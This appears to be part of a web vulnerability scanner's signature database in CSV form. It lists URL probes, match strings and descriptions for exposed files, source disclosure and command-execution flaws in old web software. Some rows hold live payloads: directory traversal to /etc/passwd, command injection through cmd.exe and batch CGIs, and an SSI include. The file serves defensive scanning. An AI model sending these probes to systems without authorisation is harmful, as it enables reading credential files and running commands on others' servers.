"000161","0","23","/pccsmysqladm/incs/dbconnect.inc","GET","200","","","","","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.","",""
"000162","0","23","/iisadmin/","GET","200","","","is restricted to Localhost","","Access to /iisadmin should be restricted to localhost or allowed hosts only.","",""
"000163","51201","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","",""
"000164","0","3","/PDG_Cart/oder.log","GET","200","","","","","Shopping cart software log","",""
"000165","0","3","/web-console/ServerInfo.jsp%00","GET","<\%=","","","","","jboss 3.2.1 with jetty seems to disclose source code.","",""
"000166","0","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information.  Map the .asa extension to the proper dll.","",""
"000167","0","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000168","0","23","/exchange/lib/DELETE.INC","GET","deleting objects","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000169","0","23","/exchange/lib/GETREND.INC","GET","GetRenderer functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000170","0","23","/exchange/lib/GETWHEN.INC","GET","functions to construct","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000171","0","23","/exchange/lib/JSATTACH.INC","GET","Attachment Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000172","0","23","/exchange/lib/JSROOT.INC","GET","Javascript Functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000173","0","23","/exchange/lib/JSUTIL.INC","GET","Common Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000174","0","23","/exchange/lib/LANG.INC","GET","localized strings","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000175","0","23","/exchange/lib/logon.inc","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000176","0","23","/exchange/lib/PAGEUTIL.INC","GET","functions that help","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000177","0","23","/exchange/lib/PUBFLD.INC","GET","Anonymous Published","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000178","0","23","/exchange/lib/RENDER.INC","GET","Rendering functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000179","0","23","/exchange/lib/SESSION.INC","GET","Session Management","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000180","0","5","/ows/restricted%2eshow","GET","200","","","","","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.","",""
"000181","0","5","/WEB-INF./web.xml","GET","200","","","","","Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l","",""
"000182","0","7","/view_source.jsp","GET","200","License Exception","","","","Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.","",""
"000183","0","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","",""
"000184","42680","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","",""
"000185","0","a","/exchange/root.asp?acs=anon","GET","\/exchange\/logonfrm\.asp","","","","","This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","",""
"000186","6181","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.","",""
"000187","0","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus. http://www.f-secure.com/v-descs/bugbear_b.shtml","",""
"000188","0","d","@CGIDIRSastrocam.cgi","GET","200","","","","","Astrocam 1.4.1 contained buffer overflow BID-4684. Prior to 2.1.3 contained unspecified security bugs","",""
"000189","0","d","@CGIDIRSbadmin.cgi","GET","200","","","","","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.","",""
"000190","2017","d","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","GET","200","","","","","Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.","",""
"000191","0","d","@CGIDIRSezadmin.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000192","0","d","@CGIDIRSezboard.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000193","0","d","@CGIDIRSezman.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000194","11740","d","@CGIDIRSfoxweb.dll","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","",""
"000195","11741","d","@CGIDIRSfoxweb.exe","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","",""
"000196","0","d","@CGIDIRSmgrqcgi","GET","200","","","","","This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.","",""
"000197","0","d","@CGIDIRSwconsole.dll","GET","200","","","","","It may be possible to overflow this dll with 1024 bytes of data.","",""
"000198","0","d","@CGIDIRSwebplus.exe?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.","",""
"000199","0","d","/pbserver/pbserver.dll","GET","200","","","","","This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp","",""
"000200","0","0","/administrator/gallery/uploadimage.php","GET","200","","","","","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.","",""
"000201","0","0","/pafiledb/includes/team/file.php","GET","200","","","","","paFileDB 3.1 and below may allow file upload without authentication.","",""
"000202","0","0","/phpEventCalendar/file_upload.php","GET","200","","","","","phpEventCalendar 1.1 and prior are vulnerable to file upload bug.","",""
"000203","0","0","/servlet/com.unify.servletexec.UploadServlet","GET","200","Error Occurred","","","","This servlet allows attackers to upload files to the server.","",""
"000204","0","0","@CGIDIRSuploader.exe","GET","200","","","","","This CGI allows attackers to upload files to the server and then execute them.","",""
"000205","0","0","/scripts/cpshost.dll","GET","200","","","","","Posting acceptor possibly allows you to upload files","",""
"000206","0","0","/scripts/repost.asp","GET","Here is your upload status","","","","","This allows uploads to /users. Create /users and give web user read only access.","",""
"000207","0","0","/upload.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","",""
"000208","0","0","/uploadn.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","",""
"000209","0","0","/uploadx.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","",""
"000210","0","0","/wa.exe","GET","200","","","","","An ASP page that allows attackers to upload files to server","",""
"000211","0","1","/basilix/compose-attach.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads","",""
"000212","0","1","/server/","GET","200","","","","","If port 8000, Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","",""
"000213","0","1","@CGIDIRSfpsrvadm.exe","GET","200","","","","","Potentially vulnerable CGI program.","",""
"000214","0","1b","/siteminder/smadmin.html","GET","Admin Login","","","","","SiteMinder admin login page available.","",""
"000215","0","1b","/vgn/ac/data","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000216","0","1b","/vgn/ac/delete","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000217","0","1b","/vgn/ac/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000218","0","1b","/vgn/ac/esave","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000219","0","1b","/vgn/ac/fsave","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000220","0","1b","/vgn/ac/index","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000221","0","1b","/vgn/asp/MetaDataUpdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000222","0","1b","/vgn/asp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000223","0","1b","/vgn/asp/status","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000224","0","1b","/vgn/asp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000225","0","1b","/vgn/errors","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000226","0","1b","/vgn/jsp/controller","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000227","0","1b","/vgn/jsp/errorpage","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000228","0","1b","/vgn/jsp/initialize","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000229","0","1b","/vgn/jsp/jspstatus","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000230","0","1b","/vgn/jsp/jspstatus56","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000231","0","1b","/vgn/jsp/metadataupdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000232","0","1b","/vgn/jsp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000233","0","1b","/vgn/jsp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000234","0","1b","/vgn/legacy/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000235","0","1b","/vgn/login","GET","200","","","","","Vignette server may allow user enumeration based on the login attempts to this file.","",""
"000236","0","2","/webtop/wdk/samples/index.jsp","GET","WDK Fusion Samples","","","","","Documentum Webtop Example Code","",""
"000237","0","2","@CGIDIRS.cobalt","GET","200","","","","","May allow remote admin of CGI scripts.","",""
"000238","0","2","/WEB-INF/web.xml","GET","web-app","","","","","JRUN default file found.","",""
"000239","35707","23","/forum/admin/wwforum.mdb","GET","200","","","","","Web Wiz Forums password database found.","",""
"000240","0","23","/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," ",""
"000241","52975","23","/guestbook/admin/o12guest.mdb","GET","200","","","","","Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.","",""
"000242","15971","23","/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000243","15971","23","/MIDICART/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000244","41850","23","/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb","GET","200","","","","","MPCSoftWeb Guest Book passwords retrieved.","",""
"000245","0","23","/news/news.mdb","GET","200","","","","","Web Wiz Site News release v3.06 admin password database is available and unencrypted.","",""
"000246","420","23","/newuser?Image=../../database/rbsserv.mdb","GET","SystemErrorsPerHour","","","","","The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.","",""
"000247","0","23","/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","",""
"000248","53413","23","/shopping300.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","",""
"000249","53413","23","/shopping400.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","",""
"000250","15971","23","/shoppingdirectory/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000251","17113","23","/SilverStream/Meta/Tables/?access-mode=text","GET","_DBProduct","","","","","The SilverStream database structure is available for remote viewing.","",""
"000252","4398","23","/database/db2000.mdb","GET","200","","","","","Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.","",""
"000253","319","28","@CGIDIRSmailit.pl","GET","200","","","","","Sambar may allow anonymous email to be sent from any host via this CGI.","",""
"000254","0","3","@CGIDIRSsearch","GET","=sourcedir","","","","","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).","",""
"000255","0","3","/doc/webmin.config.notes","GET","login and password","","","","","Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.","",""
"000256","0","3","/error/HTTP_NOT_FOUND.html.var","GET","Available variants","","","","","Apache reveals file system paths when invalid error documents are requested.","",""
"000257","0","3","/oem_webstage/cgi-bin/oemapp_cgi","GET","This script","","","","","Oracle reveals the CGI source by prepending /oem_webstage to CGI URLs.","",""
"000258","0","3","@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000259","0","3","@CGIDIRS.access","GET","200","","","","","Contains authorization information","",""
"000260","11093","3","@CGIDIRS%2e%2e/abyss.conf","GET","200","","","","","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/","",""
"000261","2396","3","@CGIDIRSdata/fetch.php?page=","GET","mysql_num_rows","","","","","Stellar Docs allows remote users to see file system paths. BID-8385.","",""
"000262","0","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory \/","","","","","This CGI allows attackers to learn the full system path to your web directory.","",""
"000263","0","3","@CGIDIRSmrtg.cgi?cfg=blah","GET","Cannot find the given config file","","","","","Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.","",""
"000264","5734","3","@CGIDIRSstore/agora.cgi?page=whatever33.html","GET","FILE:","","","","","Agora.cgi gives detailed error messages including file system paths.","",""
"000265","59658","3","/?mod=node&nid=some_thing&op=view","GET","\/node\.module\.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","",""
"000266","59658","3","/?mod=some_thing&op=browse","GET","in \/","","","","","Sage 1.0b3 reveals system paths with invalid module names.","",""
"000267","7170","3","/article.php?article=4965&post=1111111111","GET","Unable to jump to row","","","","","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.","",""
"000268","0","3","/blah123.php","GET","Failed opening ","","","","","PHP is configured to give descriptive error messages that can reveal file system paths.","",""
"000269","12649","3","/categorie.php3?cid=june","GET","Unable to jump to row","","","","","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.","",""
"000270","3233","3","/CFIDE/probe.cfm","GET","coldfusion\.tagext\.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","",""
"000271","0","3","/contents.php?new_language=elvish&mode=select","GET","200","","","","","Requesting a file with an invalid language selection from DC Portal may reveal the system path.","",""
"000272","0","3","/download.php?op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","",""
"000273","0","3","/download.php?op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","",""
"000274","59400","3","/examples/basic/servlet/HelloServlet","GET","The source of this servlet is in","","","","","Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet.","",""
"000275","5289","3","/home.php?arsc_language=elvish","GET","Failed opening '","","","","","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.","",""
"000276","0","3","/hostadmin/?page='","GET","C:\\\\","","","","","Host Admin reveals install location and other sensitive information.","",""
"000277","0","3","/hostadmin/?page='","GET","D:\\\\","","","","","Host Admin reveals install location and other sensitive information.","",""
"000278","0","3","/index.php?file=index.php","GET","Fatal error:","","","","","PHP-Nuke 5.4 allows file system paths to be shown in error messages.","",""
"000279","40589","3","/jgb_eng_php3/cfooter.php3","GET","Fatal error","","","","","Justice Guestbook may reveal file system paths in error messages.","",""
"000280","0","3","/JUNK(5).csp","GET","File not found: \/","","","","","Invalid files with .csp extension reveal the file system path to the web root.","",""
"000281","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","",""
"000282","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","",""
"000283","0","3","/modules.php?op=modload&name=0&file=0","GET","Failed opening ","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","",""
"000284","0","3","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","GET","non-object in","","","","","Postnuke v0.7.2.3-Phoenix and below reveal the file system path.","",""
"000285","0","3","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","GET","Failed opening ","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","",""
"000286","2394","3","/path/nw/article.php?id='","GET","c:\/","","","","","News Wizard 2.0 reveals the file system path.","",""
"000287","2394","3","/path/nw/article.php?id='","GET","d:\/","","","","","News Wizard 2.0 reveals the file system path.","",""
"000288","6467","3","/pw/storemgr.pw","GET","200","","","","","Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.","",""
"000289","4245","3","/rtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","",""
"000290","43917","3","/scozbook/view.php?PG=whatever","GET","Warning","","","","","ScozBook Beta 1.1 may reveal file system paths in error messages.","",""
"000291","0","3","/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->",""
"000292","0","3","/shopa_sessionlist.asp","GET","200","","","","","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.","",""
"000293","53303","3","/simplebbs/users/users.php","GET","200","","","","","Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.","",""
"000294","44056","3","/sips/sipssys/users/a/admin/user","GET","Password","","","","","SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.","",""
"000295","3093","2","/tcb/files/auth/r/root","GET","u_pwd","","","","","HP-UX has the tcb auth file system on the web server.","",""
"000296","0","3","/typo3conf/","GET","200","","","","","This may contain sensitive Typo3 files.","",""
"000297","0","3","/typo3conf/database.sql","GET","200","","","","","Typo3 SQL file found.","",""
"000298","0","3","/typo3conf/localconf.php","GET","200","","","","","Typo3 config file found.","",""
"000299","53386","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","",""
"000300","4907","3","/vgn/license","GET","200","","","","","Vignette server license file found.","",""
"000301","3092","3","/web.config","GET","<\?xml version","","200","","","ASP config file is accessible.","",""
"000302","3233","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000303","0","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000304","0","3","/webcart-lite/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000305","0","3","/webcart/carts/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000306","0","3","/webcart/config/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000307","0","3","/webcart/config/clients.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000308","0","3","/webcart/orders/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000309","0","3","/webcart/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000310","0","3","/webmail/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000311","0","3","/whateverJUNK(4).html","GET","InterScan HTTP Version","","","","","InterScan VirusWall on the remote host reveals its version number in HTTP error messages.","",""
"000312","0","3","/ws_ftp.ini","GET","200","","","","","Can contain saved passwords for FTP sites","",""
"000313","0","3","/WS_FTP.ini","GET","200","","","","","Can contain saved passwords for FTP sites","",""
"000314","11871","3","@CGIDIRSMsmMask.exe","GET","200","","","","","MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.","",""
"000315","0","3","/_mem_bin/auoconfig.asp","GET","200","","","","","Displays the default AUO (LDAP) schema, including host and port.","",""
"000316","0","3","/_mem_bin/auoconfig.asp","GET","LDAP","","","","","LDAP information revealed via asp. See http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","",""
"000317","17664","3","/_mem_bin/remind.asp","GET","Recover","","","","","Page will give the password reminder for any user requested (username must be known).","",""
"000318","0","3","/exchange/lib/ATTACH.INC","GET","File upload","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000319","17659","3","/SiteServer/Admin/knowledge/persmbr/vs.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000320","17661","3","/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000321","17662","3","/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000322","17660","3","/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000323","0","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","",""
"000324","0","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.","",""
"000325","0","3","/whatever.htr","GET","<html>Error: The requested file could not be found\. <\/html>","200","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","",""
"000327","0","3","/./","GET","[Ii]ndex [Oo]f ","","","","","Appending '/./' to a directory allows indexing","",""
"000328","0","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","",""
"000329","0","3","/nsn/fdir.bas","GET","200","","","","","You can use fdir to ShowVolume and ShowDirectory.","",""
"000330","0","3","/servlet/webacc?User.html=noexist","GET","templates\/","","","","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","",""
"000331","0","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","",""
"000332","0","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","",""
"000333","0","5","/jamdb/","GET","200","","","","","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.","",""
"000334","1201","6","/cgi/cgiproc?","GET","200","","","","","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.","",""
"000335","0","7","@CGIDIRSaddbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000336","836","7","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","",""
"000337","0","7","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","",""
"000338","0","7","@CGIDIRSshtml.dll","GET","200","","","","","This may allow attackers to retrieve document source.","",""
"000339","2400","7","/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv","GET","root:","","","","","iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2."," ",""
"000340","0","8","@CGIDIRSaglimpse.cgi","GET","200","","","","","This CGI may allow attackers to execute remote commands.","",""
"000341","0","8","@CGIDIRSaglimpse","GET","200","","","","","This CGI may allow attackers to execute remote commands.","",""
"000342","0","8","@CGIDIRSarchitext_query.cgi","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","",""
"000343","0","8","@CGIDIRScgiemail-1.4/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000344","0","8","/cgi-local/cgiemail-1.6/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000345","6196","8","/servlet/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","",""
"000346","0","8","/servlet/sunexamples.BBoardServlet","GET","200","Error Occurred","","","","This default servlet lets attackers execute arbitrary commands."," ",""
"000347","6196","8","/servlets/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","",""
"000348","0","8","@CGIDIRScmd.exe?/c+dir","GET","200","","","","","cmd.exe can execute arbitrary commands","",""
"000349","0","8","@CGIDIRScmd1.exe?/c+dir","GET","200","","","","","cmd1.exe can execute arbitrary commands","",""
"000350","0","8","@CGIDIRShello.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","",""
"000351","0","8","@CGIDIRSpost32.exe|dir%20c:\\","GET","200","","","","","post32 can execute arbitrary commands","",""
"000352","0","8","/perl/-e%20print%20Hello","GET","200","","","","","The Perl interpreter on the Novell system may allow any command to be executed. See BID-5520. Installing Perl 5.6 might fix this issue.","",""
"000353","0","a","/admin.cgi","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","",""
"000354","0","a","/interscan/","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","",""
"000355","0","a","/vgn/legacy/save","GET","200","","","","","Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.","",""
"000356","0","b","/","GET","default Tomcat","","","","","Appears to be a default Apache Tomcat install.","",""
"000357","0","b","/IDSWebApp/IDSjsp/Login.jsp","GET","200","","","","","Tivoli Directory Server Web Administration.","",""
"000358","6466","b","/quikstore.cfg","GET","200","","","","","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt","",""
"000359","0","b","/quikstore.cgi","GET","200","","","","","A shopping cart.","",""
"000360","0","b","/securecontrolpanel/","GET","200","","","","","Web Server Control Panel","",""
"000361","0","b","/siteminder","GET","200","","","","","This may be an indication that the server is running Siteminder for SSO","",""
"000362","0","b","/webmail/","GET","200","","","","","Web based mail package installed.","",""
"000363","0","b","/Xcelerate/LoginPage.html","GET","Xcelerate Login Page","","","","","Xcelerate Content Server by Divine/OpenMarket login page found.","",""
"000364","0","b","/_cti_pvt/","GET","200","","","","","FrontPage directory found.","",""
"000365","0","b","/smg_Smxcfg30.exe?vcc=3560121183d3","GET","200","","","","","This may be a Trend Micro Officescan 'backdoor'.","",""
"000366","0","2b","/examples/servlets/index.html","GET","Servlet Examples","","","","","Apache Tomcat default JSP pages present.","",""
"000367","0","3b","/nsn/..%5Cutil/attrib.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000368","0","3b","/nsn/..%5Cutil/chkvol.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000369","0","3b","/nsn/..%5Cutil/copy.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000370","0","3b","/nsn/..%5Cutil/del.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000371","0","3b","/nsn/..%5Cutil/dir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000372","0","3b","/nsn/..%5Cutil/dsbrowse.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000373","0","3b","/nsn/..%5Cutil/glist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000374","0","3b","/nsn/..%5Cutil/lancard.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000375","0","3b","/nsn/..%5Cutil/md.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000376","0","3b","/nsn/..%5Cutil/rd.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000377","0","3b","/nsn/..%5Cutil/ren.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server ","",""
